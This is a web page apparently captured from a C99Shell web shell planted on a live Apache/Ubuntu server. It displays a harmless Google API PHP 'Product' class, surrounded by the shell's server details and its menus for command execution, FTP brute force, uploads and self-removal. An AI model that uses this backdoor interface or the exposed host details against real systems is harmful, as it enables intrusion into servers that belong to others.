!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/google/apiclient-services/src/Google/Service/AndroidEnterprise/   drwxr-xr-x
Free 13 GB of 57.97 GB (22.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Product.php (6.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_AndroidEnterprise_Product extends Google_Collection
{
  protected 
$collection_key 'screenshotUrls';
  protected 
$appTracksType 'Google_Service_AndroidEnterprise_TrackInfo';
  protected 
$appTracksDataType 'array';
  protected 
$appVersionType 'Google_Service_AndroidEnterprise_AppVersion';
  protected 
$appVersionDataType 'array';
  public 
$authorName;
  public 
$availableCountries;
  public 
$availableTracks;
  public 
$category;
  public 
$contentRating;
  public 
$description;
  public 
$detailsUrl;
  public 
$distributionChannel;
  public 
$features;
  public 
$iconUrl;
  public 
$lastUpdatedTimestampMillis;
  public 
$minAndroidSdkVersion;
  protected 
$permissionsType 'Google_Service_AndroidEnterprise_ProductPermission';
  protected 
$permissionsDataType 'array';
  public 
$productId;
  public 
$productPricing;
  public 
$recentChanges;
  public 
$requiresContainerApp;
  public 
$screenshotUrls;
  protected 
$signingCertificateType 'Google_Service_AndroidEnterprise_ProductSigningCertificate';
  protected 
$signingCertificateDataType '';
  public 
$smallIconUrl;
  public 
$title;
  public 
$workDetailsUrl;

  
/**
   * @param Google_Service_AndroidEnterprise_TrackInfo[]
   */
  
public function setAppTracks($appTracks)
  {
    
$this->appTracks $appTracks;
  }
  
/**
   * @return Google_Service_AndroidEnterprise_TrackInfo[]
   */
  
public function getAppTracks()
  {
    return 
$this->appTracks;
  }
  
/**
   * @param Google_Service_AndroidEnterprise_AppVersion[]
   */
  
public function setAppVersion($appVersion)
  {
    
$this->appVersion $appVersion;
  }
  
/**
   * @return Google_Service_AndroidEnterprise_AppVersion[]
   */
  
public function getAppVersion()
  {
    return 
$this->appVersion;
  }
  public function 
setAuthorName($authorName)
  {
    
$this->authorName $authorName;
  }
  public function 
getAuthorName()
  {
    return 
$this->authorName;
  }
  public function 
setAvailableCountries($availableCountries)
  {
    
$this->availableCountries $availableCountries;
  }
  public function 
getAvailableCountries()
  {
    return 
$this->availableCountries;
  }
  public function 
setAvailableTracks($availableTracks)
  {
    
$this->availableTracks $availableTracks;
  }
  public function 
getAvailableTracks()
  {
    return 
$this->availableTracks;
  }
  public function 
setCategory($category)
  {
    
$this->category $category;
  }
  public function 
getCategory()
  {
    return 
$this->category;
  }
  public function 
setContentRating($contentRating)
  {
    
$this->contentRating $contentRating;
  }
  public function 
getContentRating()
  {
    return 
$this->contentRating;
  }
  public function 
setDescription($description)
  {
    
$this->description $description;
  }
  public function 
getDescription()
  {
    return 
$this->description;
  }
  public function 
setDetailsUrl($detailsUrl)
  {
    
$this->detailsUrl $detailsUrl;
  }
  public function 
getDetailsUrl()
  {
    return 
$this->detailsUrl;
  }
  public function 
setDistributionChannel($distributionChannel)
  {
    
$this->distributionChannel $distributionChannel;
  }
  public function 
getDistributionChannel()
  {
    return 
$this->distributionChannel;
  }
  public function 
setFeatures($features)
  {
    
$this->features $features;
  }
  public function 
getFeatures()
  {
    return 
$this->features;
  }
  public function 
setIconUrl($iconUrl)
  {
    
$this->iconUrl $iconUrl;
  }
  public function 
getIconUrl()
  {
    return 
$this->iconUrl;
  }
  public function 
setLastUpdatedTimestampMillis($lastUpdatedTimestampMillis)
  {
    
$this->lastUpdatedTimestampMillis $lastUpdatedTimestampMillis;
  }
  public function 
getLastUpdatedTimestampMillis()
  {
    return 
$this->lastUpdatedTimestampMillis;
  }
  public function 
setMinAndroidSdkVersion($minAndroidSdkVersion)
  {
    
$this->minAndroidSdkVersion $minAndroidSdkVersion;
  }
  public function 
getMinAndroidSdkVersion()
  {
    return 
$this->minAndroidSdkVersion;
  }
  
/**
   * @param Google_Service_AndroidEnterprise_ProductPermission[]
   */
  
public function setPermissions($permissions)
  {
    
$this->permissions $permissions;
  }
  
/**
   * @return Google_Service_AndroidEnterprise_ProductPermission[]
   */
  
public function getPermissions()
  {
    return 
$this->permissions;
  }
  public function 
setProductId($productId)
  {
    
$this->productId $productId;
  }
  public function 
getProductId()
  {
    return 
$this->productId;
  }
  public function 
setProductPricing($productPricing)
  {
    
$this->productPricing $productPricing;
  }
  public function 
getProductPricing()
  {
    return 
$this->productPricing;
  }
  public function 
setRecentChanges($recentChanges)
  {
    
$this->recentChanges $recentChanges;
  }
  public function 
getRecentChanges()
  {
    return 
$this->recentChanges;
  }
  public function 
setRequiresContainerApp($requiresContainerApp)
  {
    
$this->requiresContainerApp $requiresContainerApp;
  }
  public function 
getRequiresContainerApp()
  {
    return 
$this->requiresContainerApp;
  }
  public function 
setScreenshotUrls($screenshotUrls)
  {
    
$this->screenshotUrls $screenshotUrls;
  }
  public function 
getScreenshotUrls()
  {
    return 
$this->screenshotUrls;
  }
  
/**
   * @param Google_Service_AndroidEnterprise_ProductSigningCertificate
   */
  
public function setSigningCertificate(Google_Service_AndroidEnterprise_ProductSigningCertificate $signingCertificate)
  {
    
$this->signingCertificate $signingCertificate;
  }
  
/**
   * @return Google_Service_AndroidEnterprise_ProductSigningCertificate
   */
  
public function getSigningCertificate()
  {
    return 
$this->signingCertificate;
  }
  public function 
setSmallIconUrl($smallIconUrl)
  {
    
$this->smallIconUrl $smallIconUrl;
  }
  public function 
getSmallIconUrl()
  {
    return 
$this->smallIconUrl;
  }
  public function 
setTitle($title)
  {
    
$this->title $title;
  }
  public function 
getTitle()
  {
    return 
$this->title;
  }
  public function 
setWorkDetailsUrl($workDetailsUrl)
  {
    
$this->workDetailsUrl $workDetailsUrl;
  }
  public function 
getWorkDetailsUrl()
  {
    return 
$this->workDetailsUrl;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.017 ]--